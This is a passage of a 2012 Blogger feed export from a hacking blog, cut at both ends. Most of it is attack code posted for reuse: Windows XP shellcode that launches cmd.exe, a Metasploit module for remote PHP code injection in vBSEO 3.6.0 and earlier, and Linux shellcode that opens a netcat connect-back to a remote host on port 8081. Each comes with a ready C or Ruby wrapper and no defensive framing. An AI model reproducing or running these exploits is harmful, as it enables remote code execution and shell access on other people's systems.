#7ac07c;"&gt;(/%&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;22&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;/&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;gi&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;""&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryString&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryString&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;replace&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(/\&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"/gi,&amp;nbsp;"");&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;return&amp;nbsp;highlightSearchTerms(queryString,&amp;nbsp;false);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;&amp;nbsp;*&amp;nbsp;This&amp;nbsp;function&amp;nbsp;is&amp;nbsp;just&amp;nbsp;an&amp;nbsp;easy&amp;nbsp;way&amp;nbsp;to&amp;nbsp;test&amp;nbsp;the&amp;nbsp;highlightGoogleSearchTerms&lt;br /&gt;&amp;nbsp;*&amp;nbsp;function.&lt;br /&gt;&amp;nbsp;*/&lt;br /&gt;function&amp;nbsp;testHighlightGoogleSearchTerms()&lt;br /&gt;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;referrerString&amp;nbsp;=&amp;nbsp;"&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;http&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;:&lt;/span&gt;&lt;span style="color: #ffcccc;"&gt;//www.google.com/search?q=javascript%20highlight&amp;amp;start=0";&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;referrerString&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;prompt&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"Test&amp;nbsp;the&amp;nbsp;following&amp;nbsp;referrer&amp;nbsp;string:"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;referrerString&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;return&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightGoogleSearchTerms&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;referrerString&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;}&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-6916935165320328764?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/6916935165320328764/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/advanced-cookie-stealer-with-pagination.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/6916935165320328764'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/6916935165320328764'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/advanced-cookie-stealer-with-pagination.html' title='Advanced cookie stealer with pagination'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-1167444592275428999</id><published>2012-01-30T23:03:00.002+06:00</published><updated>2012-01-30T23:03:20.434+06:00</updated><title type='text'>windows/XP sp3 (ENG) cmd.exe Sellcode</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;div class="bbcode_description" style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;Code:&lt;/div&gt;&lt;pre class="bbcode_code" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; background-repeat: repeat no-repeat; border-bottom-style: inset; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-style: inset; border-left-width: 1px; border-right-style: inset; border-right-width: 1px; border-top-style: inset; border-top-width: 1px; color: #33ff00; direction: ltr; font-size: 12px; height: 372px; line-height: 12px; overflow-x: scroll; overflow-y: scroll; padding-bottom: 6px; padding-left: 6px; padding-right: 6px; padding-top: 6px;"&gt;# Title : windows/XP sp3 (ENG) cmd.exe Sellcode&lt;br /&gt;# Author :TrOoN&lt;br /&gt;# E-mail : SOUrRce-x@live.fr  | www.facebook.com/fysl.fyslm&lt;br /&gt;# Home : city 617 logts  : Draria . algeria&lt;br /&gt;# Web Site : www.1337day.com&lt;br /&gt;# platform : winDows xp SP3      |  tESTED IN WINDWOS XP SP 3 work&lt;br /&gt;# Type : SHELL CODe WINDWOS&lt;br /&gt;# WARNING : i teste in windows Xp sp3 (ENG) not windwos 7 or windwos sp2 :( thank you ....&lt;br /&gt;###&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;00402000   8BEC             MOV EBP,ESP&lt;br /&gt;00402002   33FF             XOR EDI,EDI&lt;br /&gt;00402004   57               PUSH EDI&lt;br /&gt;00402005   C645 FC 63       MOV BYTE PTR SS:[EBP-4],63&lt;br /&gt;00402009   C645 FD 6D       MOV BYTE PTR SS:[EBP-3],6D&lt;br /&gt;0040200D   C645 FE 64       MOV BYTE PTR SS:[EBP-2],64&lt;br /&gt;00402011   C645 F8 01       MOV BYTE PTR SS:[EBP-8],1&lt;br /&gt;00402015   8D45 FC          LEA EAX,DWORD PTR SS:[EBP-3]&lt;br /&gt;00402018   50               PUSH EAX&lt;br /&gt;00402019   B8 C793BF77      MOV EAX,msvcrt.system&lt;br /&gt;0040201E   FFD0             CALL EAX&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;#include "stdio.h"&lt;br /&gt;unsigned char shellcode[] =&lt;br /&gt;"\x8B\xEC\x33\xFF\x57"&lt;br /&gt;"\xC6\x45\xFC\x63\xC6\x45"&lt;br /&gt;"\xFD\x6D\xC6\x45\xFE\x64"&lt;br /&gt;"\xC4\x45\xF8\x01\x8D"&lt;br /&gt;"\x45\xFC\x50\xB8\xC7\x93"&lt;br /&gt;"\xBF\x77\xFF\xD0";&lt;br /&gt;int main ()&lt;br /&gt;{&lt;br /&gt;int *ret;&lt;br /&gt;ret=(int *)&amp;amp;ret+3;&lt;br /&gt;printf("Shellcode print is : %d\n",strlen(shellcode));&lt;br /&gt;(*ret)=(int)shellcode;&lt;br /&gt;return 0;&lt;br /&gt;}&lt;/pre&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-1167444592275428999?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/1167444592275428999/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/windowsxp-sp3-eng-cmdexe-sellcode.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/1167444592275428999'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/1167444592275428999'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/windowsxp-sp3-eng-cmdexe-sellcode.html' title='windows/XP sp3 (ENG) cmd.exe Sellcode'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-2630082854402281856</id><published>2012-01-30T23:00:00.002+06:00</published><updated>2012-01-30T23:00:15.669+06:00</updated><title type='text'>vBSEO &lt;= 3.6.0 "proc_deutf()" Remote PHP Code Injection</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;div class="bbcode_description" style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;Code:&lt;/div&gt;&lt;pre class="bbcode_code" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; background-repeat: repeat no-repeat; border-bottom-style: inset; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-style: inset; border-left-width: 1px; border-right-style: inset; border-right-width: 1px; border-top-style: inset; border-top-width: 1px; color: #33ff00; direction: ltr; font-size: 12px; height: 372px; line-height: 12px; overflow-x: scroll; overflow-y: scroll; padding-bottom: 6px; padding-left: 6px; padding-right: 6px; padding-top: 6px;"&gt;require 'msf/core'&lt;br /&gt;class Metasploit3 &amp;lt; Msf::Exploit::Remote&lt;br /&gt;    include Msf::Exploit::Remote::HttpClient&lt;br /&gt;    def initialize(info = {})&lt;br /&gt;        super(update_info(info,&lt;br /&gt;            'Name'           =&amp;gt; 'vBSEO &amp;lt;= 3.6.0 "proc_deutf()" Remote PHP Code Injection',&lt;br /&gt;            'Description'    =&amp;gt; %q{&lt;br /&gt;                    This module exploits a vulnerability in the 'proc_deutf()' function&lt;br /&gt;                defined in /includes/functions_vbseocp_abstract.php. User input passed through&lt;br /&gt;                'char_repl' POST parameter isn't properly sanitized before being used in a call&lt;br /&gt;                to preg_replace() function which uses the 'e' modifier. This can be exploited to&lt;br /&gt;                inject and execute arbitrary code leveraging the PHP's complex curly syntax.&lt;br /&gt;            },&lt;br /&gt;            'Author'         =&amp;gt; 'EgiX &amp;lt;n0b0d13s[at]gmail.com&amp;gt;', # originally reported by the vendor&lt;br /&gt;            'License'        =&amp;gt; MSF_LICENSE,&lt;br /&gt;            'Version'        =&amp;gt; '$Revision$',&lt;br /&gt;            'References'     =&amp;gt;&lt;br /&gt;                [&lt;br /&gt;                    ['BID', '51647'],&lt;br /&gt;                    ['URL', 'http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/'],&lt;br /&gt;                ],&lt;br /&gt;            'Privileged'     =&amp;gt; false,&lt;br /&gt;            'Payload'        =&amp;gt;&lt;br /&gt;                {&lt;br /&gt;                    'DisableNops' =&amp;gt; true,&lt;br /&gt;                    'Space'       =&amp;gt; 8190,&lt;br /&gt;                    'Keys'        =&amp;gt; ['php'],&lt;br /&gt;                },&lt;br /&gt;            'Platform'       =&amp;gt; ['php'],&lt;br /&gt;            'Arch'           =&amp;gt; ARCH_PHP,&lt;br /&gt;            'Targets'        =&amp;gt; [[ 'Automatic', { }]],&lt;br /&gt;            'DisclosureDate' =&amp;gt; 'Jan 23 2012',&lt;br /&gt;            'DefaultTarget'  =&amp;gt; 0))&lt;br /&gt;            register_options(&lt;br /&gt;                [&lt;br /&gt;                    OptString.new('URI', [true, "The full URI path to vBulletin", "/vb/"]),&lt;br /&gt;                ], self.class)&lt;br /&gt;    end&lt;br /&gt;    def check&lt;br /&gt;        flag = rand_text_alpha(rand(10)+10)&lt;br /&gt;        data = "char_repl='{${print(#{flag})}}'=&amp;gt;"&lt;br /&gt;        uri = ''&lt;br /&gt;        uri &amp;lt;&amp;lt; datastore['URI']&lt;br /&gt;        uri &amp;lt;&amp;lt; '/' if uri[-1,1] != '/'&lt;br /&gt;        uri &amp;lt;&amp;lt; 'vbseocp.php'&lt;br /&gt;        response = send_request_cgi({&lt;br /&gt;            'method' =&amp;gt; "POST",&lt;br /&gt;            'uri' =&amp;gt; uri,&lt;br /&gt;            'data' =&amp;gt; "#{data}"&lt;br /&gt;        })&lt;br /&gt;        if response.code == 200 and response.body =~ /#{flag}/&lt;br /&gt;            return Exploit::CheckCode::Vulnerable&lt;br /&gt;        end&lt;br /&gt;        return Exploit::CheckCode::Safe&lt;br /&gt;    end&lt;br /&gt;    def exploit&lt;br /&gt;        if datastore['CMD']&lt;br /&gt;            p = "passthru(\"%s\");" % datastore['CMD']&lt;br /&gt;            p = Rex::Text.encode_base64(p)&lt;br /&gt;        else&lt;br /&gt;            p = Rex::Text.encode_base64(payload.encoded)&lt;br /&gt;        end&lt;br /&gt;        data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=&amp;gt;"&lt;br /&gt;        uri = ''&lt;br /&gt;        uri &amp;lt;&amp;lt; datastore['URI']&lt;br /&gt;        uri &amp;lt;&amp;lt; '/' if uri[-1,1] != '/'&lt;br /&gt;        uri &amp;lt;&amp;lt; 'vbseocp.php'&lt;br /&gt;        response = send_request_cgi({&lt;br /&gt;            'method' =&amp;gt; 'POST',&lt;br /&gt;            'uri' =&amp;gt; uri,&lt;br /&gt;            'data' =&amp;gt; data,&lt;br /&gt;            'headers' =&amp;gt; { 'Code' =&amp;gt; p }&lt;br /&gt;        })&lt;br /&gt;        print_status("%s" % response.body) if datastore['CMD']&lt;br /&gt;    end&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br class="Apple-interchange-newline" /&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-2630082854402281856?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/2630082854402281856/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/vbseo-360-procdeutf-remote-php-code.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/2630082854402281856'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/2630082854402281856'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/vbseo-360-procdeutf-remote-php-code.html' title='vBSEO &lt;= 3.6.0 &quot;proc_deutf()&quot; Remote PHP Code Injection'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-4036168886781404322</id><published>2012-01-30T22:39:00.001+06:00</published><updated>2012-01-30T22:39:17.822+06:00</updated><title type='text'>Linux/x86 - netcat : connect back port 8081 - 76 bytes</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;div class="bbcode_description" style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;Code:&lt;/div&gt;&lt;pre class="bbcode_code" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; background-repeat: repeat no-repeat; border-bottom-style: inset; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-style: inset; border-left-width: 1px; border-right-style: inset; border-right-width: 1px; border-top-style: inset; border-top-width: 1px; color: #33ff00; direction: ltr; font-size: 12px; height: 372px; line-height: 12px; overflow-x: scroll; overflow-y: scroll; padding-bottom: 6px; padding-left: 6px; padding-right: 6px; padding-top: 6px;"&gt;# Title : Linux/x86 - netcat : connect back port 8081 - 76 bytes&lt;br /&gt;# Author :TrOoN&lt;br /&gt;# E-mail : SOUrRce-x@live.fr  | www.facebook.com/fysl.fyslm&lt;br /&gt;# Home : city 617 logts  : Draria . algeria&lt;br /&gt;# Web Site : www.1337day.com&lt;br /&gt;# platform :Linux/x86      | backBox    | uBuntU Fr&lt;br /&gt;# Type : local exploit /SHELL CODE&lt;br /&gt;###&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;08048060 &amp;lt;_start&amp;gt;:&lt;br /&gt; 8048060:       eb 2a                   jmp    804808c &amp;lt;GotoCall&amp;gt;&lt;br /&gt; &lt;br /&gt;08048062 &amp;lt;shellcode&amp;gt;:&lt;br /&gt; 8048062:       5e                      pop    %esi&lt;br /&gt; 8048063:       31 c0                   xor    %eax,%eax&lt;br /&gt; 8048065:       88 46 07                mov    %al,0x7(%esi)&lt;br /&gt; 8048068:       88 46 15                mov    %al,0x15(%esi)&lt;br /&gt; 804806b:       88 46 1a                mov    %al,0x1a(%esi)&lt;br /&gt; 804806e:       89 76 1b                mov    %esi,0x1b(%esi)&lt;br /&gt; 8048071:       8d 5e 08                lea    0x8(%esi),%ebx&lt;br /&gt; 8048074:       89 5e 1f                mov    %ebx,0x1f(%esi)&lt;br /&gt; 8048077:       8d 5e 16                lea    0x16(%esi),%ebx&lt;br /&gt; 804807a:       89 5e 23                mov    %ebx,0x23(%esi)&lt;br /&gt; 804807d:       89 46 27                mov    %eax,0x27(%esi)&lt;br /&gt; 8048080:       b0 0b                   mov    $0xb,%al&lt;br /&gt; 8048082:       89 f3                   mov    %esi,%ebx&lt;br /&gt; 8048084:       8d 4e 1b                lea    0x1b(%esi),%ecx&lt;br /&gt; 8048087:       8d 56 27                lea    0x27(%esi),%edx&lt;br /&gt; 804808a:       cd 80                   int    $0x80&lt;br /&gt; &lt;br /&gt;0804808c &amp;lt;GotoCall&amp;gt;:&lt;br /&gt; 804808c:       e8 d1 ff ff ff          call   8048062 &amp;lt;shellcode&amp;gt;&lt;br /&gt; 8048091:       2f                      das   &lt;br /&gt; 8048092:       62 69 6e                bound  %ebp,0x6e(%ecx)&lt;br /&gt; 8048095:       2f                      das   &lt;br /&gt; 8048096:       6e                      outsb  %ds:(%esi),(%dx)&lt;br /&gt; 8048097:       63 23                   arpl   %sp,(%ebx)&lt;br /&gt; 8048099:       31 39                   xor    %edi,(%ecx)&lt;br /&gt; 804809b:       32 2e                   xor    (%esi),%ch&lt;br /&gt; 804809d:       31 36                   xor    %esi,(%esi)&lt;br /&gt; 804809f:       38 2e                   cmp    %ch,(%esi)&lt;br /&gt; 80480a1:       31 2e                   xor    %ebp,(%esi)&lt;br /&gt; 80480a3:       31 30                   xor    %esi,(%eax)&lt;br /&gt; 80480a5:       31 23                   xor    %esp,(%ebx)&lt;br /&gt; 80480a7:       38 30                   cmp    %dh,(%eax)&lt;br /&gt; 80480a9:       38 30                   cmp    %dh,(%eax)&lt;br /&gt; 80480ab:       23 41 41                and    0x41(%ecx),%eax&lt;br /&gt; 80480ae:       41                      inc    %ecx&lt;br /&gt; 80480af:       41                      inc    %ecx&lt;br /&gt; 80480b0:       42                      inc    %edx&lt;br /&gt; 80480b1:       42                      inc    %edx&lt;br /&gt; 80480b2:       42                      inc    %edx&lt;br /&gt; 80480b3:       42                      inc    %edx&lt;br /&gt; 80480b4:       43                      inc    %ebx&lt;br /&gt; 80480b5:       43                      inc    %ebx&lt;br /&gt; 80480b6:       43                      inc    %ebx&lt;br /&gt; 80480b7:       43                      inc    %ebx&lt;br /&gt; 80480b8:       44                      inc    %esp&lt;br /&gt; 80480b9:       44                      inc    %esp&lt;br /&gt; 80480ba:       44                      inc    %esp&lt;br /&gt; 80480bb:       44                      inc    %esp&lt;br /&gt;*/&lt;br /&gt; &lt;br /&gt;// /bin/nc 192.168.1.100 8081&lt;br /&gt;char shellcode[] =&lt;br /&gt;"\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x15\x88\x46\x1a\x89\x76\x1b\x8d\x5e\x08\x89"&lt;br /&gt;"\x5e\x1f\x8d\x5e\x16\x89\x5e\x23\x89\x46\x27\xb0\x0b\x89\xf3\x8d\x4e\x1b\x8d\x56\x27"&lt;br /&gt;"\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x23\x31\x39\x32\x2e\x31\x36"&lt;br /&gt;"\x38\x2e\x31\x2e\x31\x30\x31\x23\x38\x30\x38\x30\x23";&lt;br /&gt; &lt;br /&gt;int main()&lt;br /&gt;{&lt;br /&gt;    int *ret;&lt;br /&gt;    ret = (int *)&amp;amp;ret + 2;&lt;br /&gt;    (*ret) = (int)shellcode;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-4036168886781404322?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/4036168886781404322/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/linuxx86-netcat-connect-back-port-8081.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/4036168886781404322'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/4036168886781404322'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/linuxx86-netcat-connect-back-port-8081.html' title='Linux/x86 - netcat : connect back port 8081 - 76 bytes'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-2039910979897852449</id><published>2012-01-29T17:12:00.002+06:00</published><updated>2012-01-29T17:12:21.860+06:00</updated><title type='text'>darkc0de.com [archive]</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;div style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img alt="" border="0" src="http://i.minus.com/iVMJ2BjgmTPES.jpg" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; max-width: 800px;" /&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;" /&gt;&lt;b style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;&lt;span style="color: darkorange;"&gt;Categories:&lt;/span&gt;&lt;/b&gt;&lt;ul style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 1em; margin-left: 2em; margin-right: 1em; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;&lt;li style="list-style-image: initial; list-style-position: outside; list-style-type: disc; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;bruteforce&lt;/li&gt;&lt;/ul&gt;&lt;ul style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 1em; margin-left: 2em; margin-right: 1em; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;&lt;li style="list-style-image: initial; list-style-position: outside; list-style-type: disc; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;c0de&lt;/li&gt;&lt;/ul&gt;&lt;ul style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 1em; margin-left: 2em; margin-right: 1em; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;&lt;li style="list-style-image: initial; list-style-position: outside; list-style-type: disc; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;cheatsheets&lt;/li&gt;&lt;/ul&gt;&lt;ul style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 1em; margin-left: 2em; margin-right: 1em; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;&lt;li style="list-style-image: initial; list-style-position: outside; list-style-type: disc; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;encryption&lt;/li&gt;&lt;/ul&gt;&lt;ul style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 1em; margin-left: 2em; margin-right: 1em; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;&lt;li style="list-style-image: initial; list-style-position: outside; list-style-type: disc; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;exploits&lt;/li&gt;&lt;/ul&gt;&lt;ul style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 1em; margin-left: 2em; margin-right: 1em; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;&lt;li style="list-style-image: initial; list-style-position: outside; list-style-type: disc; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;ircbots&lt;/li&gt;&lt;/ul&gt;&lt;ul style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 1em; margin-left: 2em; margin-right: 1em; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;&lt;li style="list-style-image: initial; list-style-position: outside; list-style-type: disc; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;misc&lt;/li&gt;&lt;/ul&gt;&lt;ul style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 1em; margin-left: 2em; margin-right: 1em; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;"&gt;&lt;li style="list-style-image: initial; list-style-position: outside; list-style-type: disc; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;others&lt;/li&gt;&lt;/ul&gt;&lt;ul style="background-color: #333333; color: #33ff00; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; 